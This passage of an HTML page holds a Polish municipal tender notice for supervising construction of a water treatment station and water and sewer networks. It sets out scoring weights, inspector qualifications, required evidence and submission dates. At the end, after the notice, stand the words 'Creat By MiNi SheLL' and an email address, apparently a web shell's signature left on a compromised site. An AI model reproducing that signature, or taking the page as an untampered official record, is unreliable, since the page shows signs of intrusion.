zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>2. Przy wyborze oferty Zamawiający kierował się będzie następującymi kryteriami oceny ofert i ich wagą (dla każdej z części):<br/>KRYTERIUM WAGA %<br/>A<br/>Liczba punktów uzyskanych w kryterium<br/>– cena oferty<br/>60<br/>B<br/>Liczba punktów uzyskanych w kryterium<br/>– doświadczenie inspektora nadzoru robót instalacyjnych sanitarnych<br/>20<br/>C<br/>Liczba punktów uzyskanych w kryterium<br/>– doświadczenie inspektora nadzoru robót konstrukcyjno-budowlanych<br/>20<br/>LP<br/>Liczba wszystkich punktów uzyskanych przez ofertę badaną<br/>100<br/>Zamawiający udzieli zamówienia Wykonawcy, który złożył najkorzystniejszą z największą ilością uzyskanych punktów ofertę obejmującą realizację zamówienia, stanowiącą sumę punktów przyznanych w ramach każdego z podanych kryteriów udzielenia zamówienia na podstawie poniższego wzoru:<br/>LP = A + B + C<br/>ZP.271.2.2023<br/>Strona25<br/>Kryterium - /A/<br/>CENA OFERTY – waga 60%<br/>Kryterium „cena oferty” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu ofertowym (Załącznik nr 1a/1b do SWZ).<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru.<br/>*najniższa cena brutto w złotych spośród ofert niepodlegających odrzuceniu i złożonych przez Wykonawców, którzy nie podlegali wykluczeniu w danym etapie badania i oceny ofert.<br/>Kryterium - /B/<br/>DOŚWIADCZENIE INSPEKTORA NADZORU ROBÓT INSTALACYJNYCH SANITARNYCH - waga 20%<br/>Kryterium „doświadczenie inspektora nadzoru robót instalacyjnych sanitarnych” na przedmiot zamówienia będzie rozpatrywane na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym (Załącznik nr 1a/1b do SWZ).<br/>Kryterium - /C/<br/>DOŚWIADCZENIE INSPEKTORA NADZORU ROBÓT KONSTRUKCYJNO-BUDOWLANYCH - waga 20%<br/>Kryterium „doświadczenie inspektora nadzoru robót konstrukcyjno-budowlanych” na przedmiot zamówienia będzie rozpatrywane na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym (Załącznik nr 1a/1b do SWZ).<br/>najniższa cena*<br/>Cena /A/ = --------------------------------- x 60<br/>cena badanej oferty<br/>Doświadczenie<br/>1 budowa<br/>2 budowy<br/>3 budowy (lub więcej)<br/>Przyznane:<br/>0 punktów<br/>10 punktów<br/>20 punktów<br/>ZP.271.2.2023<br/>Strona26<br/>UWAGA:<br/>− Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans Kryterium „Cena” i „Doświadczenie z kryterium B i C”, Zamawiający spośród tych ofert wybiera ofertę z najniższa ceną.<br/>− W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>− Wyniki poszczególnych działań matematycznych będą zaokrąglane do dwóch miejsc po przecinku lub z większą dokładnością, jeżeli przy zastosowaniu wymienionego zaokrąglenia nie występuje różnica w ilości przyznanych punktów.<br/>− Oferta może uzyskać maksymalnie 100 punktów.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/><br/>Z uwagi na ograniczoną ilość znaków pełen opis znajduje się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba punktów uzyskanych w kryterium – doświadczenie inspektora nadzoru robót instalacyjnych sanitarnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba punktów uzyskanych w kryterium – doświadczenie inspektora nadzoru robót konstrukcyjno-budowlanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia obejmującego Część 1 mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej – Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>4) zdolności technicznej lub zawodowej<br/>– w zakresie posiadania wiedzy i doświadczenia:<br/>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał należycie co najmniej jedną usługę (*) polegającą na pełnieniu nadzoru inwestorskiego nad budową lub rozbudową lub remontem stacji uzdatniania wody o wydajności technologicznej nie mniejszej niż 14 m3/h,<br/>wraz z podaniem jej wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługa została wykonana z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy, w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>b) w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał należycie co najmniej jedną usługę (*) polegającą na pełnieniu nadzoru inwestorskiego nad budową lub rozbudową sieci wodociągowej i sieci kanalizacji sanitarnej (w jednym zadaniu) o długości minimum 0,5 km każda z sieci i obejmującej budowę lub przebudowę co najmniej jednej sieciowej przepompowni ścieków, wraz z podaniem jej wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługa została wykonana z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy, w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>Z ww. dokumentów musi wynikać że wykonane zadania obejmowały wszystkie elementy określone w punkcie a i b).<br/>W przypadku oferty wspólnej wykonawców warunek można spełnić łącznie.<br/>zdolności technicznej i zawodowej<br/>- w zakresie dysponowania osobami zdolnymi do wykonania zamówienia:<br/>Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował niżej wymienionymi osobami posiadającymi następujące kwalifikacje zawodowe:<br/>a) Inspektor nadzoru robót instalacyjnych sanitarnych – Przedstawiciel Wykonawcy (1 osoba) – posiadający następujące kwalifikacje:<br/>• uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (*),<br/>• doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót co najmniej jednej inwestycji obejmującej budowę lub przebudowę lub remont stacji uzdatniania wody o wydajności technologicznej nie mniejszej niż 14 m3/h.<br/>oraz<br/>• doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót co najmniej jednej inwestycji obejmujących budowę lub przebudowę sieci wodociągowej i sieci kanalizacji sanitarnej (w jednym zadaniu), o długości minimum 0,5 km każda z sieci i obejmującej budowę lub przebudowę co najmniej jednej sieciowej przepompowni ścieków,<br/>b) Inspektor nadzoru robót konstrukcyjno-budowlanych – Przedstawiciel Wykonawcy (1 osoba) – posiadający następujące kwalifikacje:• uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej (*)<br/>• doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót co najmniej jednej inwestycji obejmujących budowę lub przebudowę lub remont stacji uzdatniania wody o wydajności technologicznej nie mniejszej niż 14 m3/h.<br/>c) Inspektor nadzoru robót elektrycznych, elektroenergetycznych oraz AKPiA – Przedstawiciel Wykonawcy (1 osoba) – posiadający następujące kwalifikacje:<br/>• uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (*),<br/>• doświadczenie zawodowe w kierowaniu lub nadzorowaniu robót co najmniej jednej inwestycji obejmującej budowę lub przebudowę lub remont stacji uzdatniania wody o wydajności technologicznej nie mniejszej niż 14 m3/h.<br/>W przypadku oferty wspólnej Wykonawców warunek musi spełnić przynajmniej jeden z Wykonawców.<br/>UWAGA*: Przez uprawnienia budowlane należy rozumieć: uprawnienia, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (j.t.: z 2021 r. poz. 2351 ze zm.) oraz w rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831). Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień dopuszcza odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2021 r. poz. 1646). Wykonawca powinien zapewnić kluczowym specjalistom niezbędne wsparcie i pomoc techniczną ze strony innych specjalistów, która może być niezbędna do wykonania kontraktu na roboty. Wynagrodzenie ww. personelu musi zostać uwzględnione w cenie ofertowej. Wykonawca ponosi pełną odpowiedzialność za dobór personelu dodatkowego. Wszystkie ww. osoby muszą posługiwać się językiem polskim lub w przypadku braku znajomości języka polskiego Wykonawca zobowiązany jest na własny koszt do zapewnienia tłumaczenia języka polskiego w celu stałego tłumaczenia w kontaktach pomiędzy Zamawiającym a personelem Wykonawcy.<br/>3. O udzielenie zamówienia obejmującego Część 2 mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>5) zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa szczegółowego warunku w tym zakresie;6) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>7) sytuacji ekonomicznej lub finansowej – Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>8) zdolności technicznej lub zawodowej<br/>– w zakresie posiadania wiedzy i doświadczenia:<br/>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał należycie co najmniej jedną usługę (*) polegającą na pełnieniu nadzoru nad budową lub rozbudową lub remontem stacji uzdatniania wody o wydajności technologicznej nie mniejszej niż 14 m3/h,<br/>wraz z podaniem jej wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługa została wykonana z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy, w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>Z ww. dokumentów musi wynikać że wykonane zadania obejmowały wszystkie elementy określone w punkcie a).<br/>W przypadku oferty wspólnej wykonawców warunek można spełnić łącznie.<br/>zdolności technicznej i zawodowej-w zakresie dysponowania osobami zdolnymi do wykonania zamówienia:Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował niżej wymienionymi osobami posiadającymi następujące kwalifikacje zawodowe:b) Inspektor nadzoru robót instalacyjnych sanitarnych – Przedstawiciel Wykonawcy (1 osoba)–posiadający następujące kwalifikacje:<br/>• uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (*),<br/>Z uwagi na ograniczoną ilość znaków pełen opis warunków znajduje się w SWZ w roz.VII <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2a i 2b do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa wyżej stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych – tj. aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:<br/>1) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r., poz. 275 z późn. zm.) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie ofert, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z usługami stanowiącymi przedmiot zamówienia, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługa została wykonana z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy, w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert – Załącznik nr 5a/5b do SWZ;<br/>4) wykaz osób skierowanych przez Wykonawcę do realizacji przedmiotu zamówienia zgodnie z Załącznikiem nr 6a/6b do SWZ;<br/>4. W przypadku, gdy Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu, powołuje się na podmiot, o którym mowa w art. 118 ust. 1 ustawy, musi wykazać, że wobec tego podmiotu nie zachodzą przesłanki wykluczenia, o których mowa w rozdziale VIII niniejszej SWZ.<br/>5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 3 pkt 2 powyżej, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/><br/>Z uwagi na ograniczoną ilość znaków pełen opis warunków znajduje się w SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2a i 2b do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa wyżej stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych – tj. aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:<br/>1) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r., poz. 275 z późn. zm.) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie ofert, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z usługami stanowiącymi przedmiot zamówienia, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługa została wykonana z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy, w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert – Załącznik nr 5a/5b do SWZ;<br/>4) wykaz osób skierowanych przez Wykonawcę do realizacji przedmiotu zamówienia zgodnie z Załącznikiem nr 6a/6b do SWZ;<br/>4. W przypadku, gdy Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu, powołuje się na podmiot, o którym mowa w art. 118 ust. 1 ustawy, musi wykazać, że wobec tego podmiotu nie zachodzą przesłanki wykluczenia, o których mowa w rozdziale VIII niniejszej SWZ.<br/>5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 3 pkt 2 powyżej, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/><br/>Z uwagi na ograniczoną ilość znaków pełen opis warunków znajduje się w SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o którym mowa w rozdziale IX ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia tepotwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w Projekcie Umowy, stanowiącym Załącznik nr 7 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 – 455 PZP oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 7 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kaliska</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-03 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com